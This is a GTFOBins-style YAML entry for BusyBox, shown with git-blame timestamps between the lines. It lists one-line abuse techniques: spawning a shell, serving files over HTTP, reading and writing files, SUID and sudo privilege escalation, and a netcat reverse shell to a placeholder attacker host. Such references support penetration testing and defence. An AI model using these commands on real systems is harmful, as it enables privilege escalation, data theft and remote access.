2018-05-31 21:09:44 +02:00
|
|
|
---
|
2023-01-19 07:13:20 +01:00
|
|
|
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFOBins binaries are supported. Here some example.
|
2018-05-31 21:09:44 +02:00
|
|
|
functions:
|
2018-10-05 19:55:38 +02:00
|
|
|
shell:
|
2018-07-16 15:01:50 +02:00
|
|
|
- code: busybox sh
|
2018-10-05 19:55:38 +02:00
|
|
|
file-upload:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: Serve files in the local folder running an HTTP server.
|
|
|
|
|
code: |
|
2020-06-10 23:04:59 +02:00
|
|
|
LPORT=12345
|
2018-07-16 15:01:50 +02:00
|
|
|
busybox httpd -f -p $LPORT -h .
|
2018-07-04 20:26:52 +02:00
|
|
|
file-write:
|
2018-07-16 15:01:50 +02:00
|
|
|
- code: |
|
|
|
|
|
LFILE=file_to_write
|
2018-08-20 14:35:43 +02:00
|
|
|
busybox sh -c 'echo "DATA" > $LFILE'
|
2018-07-04 20:26:52 +02:00
|
|
|
file-read:
|
2018-07-16 15:01:50 +02:00
|
|
|
- code: |
|
|
|
|
|
LFILE=file_to_read
|
|
|
|
|
./busybox cat "$LFILE"
|
2018-10-05 19:55:38 +02:00
|
|
|
suid:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
|
|
|
|
|
code: "./busybox sh"
|
2018-10-05 19:55:38 +02:00
|
|
|
sudo:
|
2018-07-16 15:01:50 +02:00
|
|
|
- code: sudo busybox sh
|
2023-12-23 13:03:05 +01:00
|
|
|
reverse-shell:
|
|
|
|
|
- description: Run `nc -lvp 12345` on the attacker box to receive the shell.
|
|
|
|
|
code: |
|
|
|
|
|
RHOST=attacker.com
|
|
|
|
|
RPORT=12345
|
|
|
|
|
busybox nc -e /bin/sh $RHOST $RPORT
|
2018-05-31 21:09:44 +02:00
|
|
|
---
|
